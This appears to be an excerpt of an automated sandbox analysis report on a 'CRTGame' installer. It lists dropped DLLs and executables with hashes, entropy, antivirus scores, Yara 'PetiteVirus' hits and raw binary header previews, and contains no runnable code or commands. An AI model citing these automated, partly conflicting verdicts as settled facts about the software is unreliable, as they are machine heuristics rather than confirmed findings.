Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-HVEOK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36416
Entropy (8bit):	7.842278356440954
Encrypted:	false
SSDEEP:	768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
MD5:	BEBA64522AA8265751187E38D1FC0653
SHA1:	63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
SHA-256:	8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
SHA-512:	13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........

C:\Program Files (x86)\CRTGame\bin\x86\is-ISCOD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	394752
Entropy (8bit):	6.662070316214798
Encrypted:	false
SSDEEP:	6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
MD5:	A4123DE65270C91849FFEB8515A864C4
SHA1:	93971C6BB25F3F4D54D4DF6C0C002199A2F84525
SHA-256:	43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
SHA-512:	D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-ITM21.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	562190
Entropy (8bit):	6.388293171196564
Encrypted:	false
SSDEEP:	12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
MD5:	713D04E7396D3A4EFF6BF8BA8B9CB2CD
SHA1:	D824F373C219B33988CFA3D4A53E7C2BFA096870
SHA-256:	00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
SHA-512:	30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	149845
Entropy (8bit):	7.893881970959476
Encrypted:	false
SSDEEP:	3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
MD5:	526E02E9EB8953655EB293D8BAC59C8F
SHA1:	7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
SHA-256:	E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
SHA-512:	053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E

C:\Program Files (x86)\CRTGame\bin\x86\is-JB8NH.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	512014
Entropy (8bit):	6.566561154468342
Encrypted:	false
SSDEEP:	12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
MD5:	C4A2068C59597175CD1A29F3E7F31BC1
SHA1:	89DE0169028E2BDD5F87A51E2251F7364981044D
SHA-256:	7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
SHA-512:	0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-KR7LG.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34392
Entropy (8bit):	7.81689943223162
Encrypted:	false
SSDEEP:	768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
MD5:	EA245B00B9D27EF2BD96548A50A9CC2C
SHA1:	8463FDCDD5CED10C519EE0B406408AE55368E094
SHA-256:	4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
SHA-512:	EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7910
Entropy (8bit):	6.931925007191986
Encrypted:	false
SSDEEP:	192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
MD5:	1268DEA570A7511FDC8E70C1149F6743
SHA1:	1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
SHA-256:	F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
SHA-512:	E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmp, Author: Joe Security
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................\|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..

C:\Program Files (x86)\CRTGame\bin\x86\is-LTIA8.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39304
Entropy (8bit):	7.819409739152795
Encrypted:	false
SSDEEP:	768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
MD5:	C7A50ACE28DDE05B897E000FA398BBCE
SHA1:	33DA507B06614F890D8C8239E71D3D1372E61DAA
SHA-256:	F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
SHA-512:	4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.\|w.t...\..dkB%..i.cX...`B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....\|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..

C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	127669
Entropy (8bit):	7.952352167575405
Encrypted:	false
SSDEEP:	3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
MD5:	75C1D7A3BDF1A309C540B998901A35A7
SHA1:	B06FEEAC73D496C435C66B9B7FF7514CBE768D84
SHA-256:	6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
SHA-512:	8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmp, Author: Joe Security
Preview:	MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...

C:\Program Files (x86)\CRTGame\bin\x86\is-MJ59N.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36752
Entropy (8bit):	7.780431937344781
Encrypted:	false
SSDEEP:	768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
MD5:	9FF783BB73F8868FA6599CDE65ED21D7
SHA1:	F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
SHA-256:	E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
SHA-512:	C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x\|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p.....X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..\|....J

C:\Program Files (x86)\CRTGame\bin\x86\is-NJ7JN.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	62478
Entropy (8bit):	6.063363187934607
Encrypted:	false
SSDEEP:	768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
MD5:	940EEBDB301CB64C7EA2E7FA0646DAA3
SHA1:	0347F029DA33C30BBF3FB067A634B49E8C89FEC2
SHA-256:	B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
SHA-512:	50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..\|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..\|....P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-O5QKP.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112640
Entropy (8bit):	6.540227486061059
Encrypted:	false
SSDEEP:	1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
MD5:	BDB65DCE335AC29ECCBC2CA7A7AD36B7
SHA1:	CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
SHA-256:	7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
SHA-512:	8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-OGODD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	845312
Entropy (8bit):	6.581151900686739
Encrypted:	false
SSDEEP:	24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
MD5:	00C672988C2B0A2CB818F4D382C1BE5D
SHA1:	57121C4852B36746146B10B5B97B5A76628F385F
SHA-256:	4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
SHA-512:	C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-OMKRE.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	214016
Entropy (8bit):	6.676457645865373
Encrypted:	false
SSDEEP:	3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
MD5:	2C747F19BF1295EBBDAB9FB14BB19EE2
SHA1:	6F3B71826C51C739D6BB75085E634B2B2EF538BC
SHA-256:	D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
SHA-512:	C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68876
Entropy (8bit):	7.922125376804506
Encrypted:	false
SSDEEP:	1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
MD5:	4E35BA785CD3B37A3702E577510F39E3
SHA1:	A2FD74A68BEFF732E5F3CB0835713AEA8D639902
SHA-256:	0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
SHA-512:	1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmp, Author: Joe Security
Preview:	MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c..=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..

C:\Program Files (x86)\CRTGame\bin\x86\is-PBK8V.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	852754
Entropy (8bit):	6.503318968423685
Encrypted:	false
SSDEEP:	12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
MD5:	07FB6D31F37FB1B4164BEF301306C288
SHA1:	4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
SHA-256:	06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
SHA-512:	CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............

C:\Program Files (x86)\CRTGame\bin\x86\is-SE4OO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	ASCII text
Category:	dropped
Size (bytes):	26526
Entropy (8bit):	4.600837395607617
Encrypted:	false
SSDEEP:	384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
MD5:	BD7A443320AF8C812E4C18D1B79DF004
SHA1:	37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
SHA-256:	B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
SHA-512:	21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
Malicious:	false
Preview:	GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who

C:\Program Files (x86)\CRTGame\bin\x86\is-UG8V7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.192037544202194
Encrypted:	false
SSDEEP:	384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
MD5:	BEFD36FE8383549246E1FD49DB270C07
SHA1:	1EF12B568599F31292879A8581F6CD0279F3E92A
SHA-256:	B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
SHA-512:	FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-VP35T.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	294926
Entropy (8bit):	6.191604766067493
Encrypted:	false
SSDEEP:	3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
MD5:	C76C9AE552E4CE69E3EB9EC380BC0A42
SHA1:	EFFEC2973C3D678441AF76CFAA55E781271BD1FB
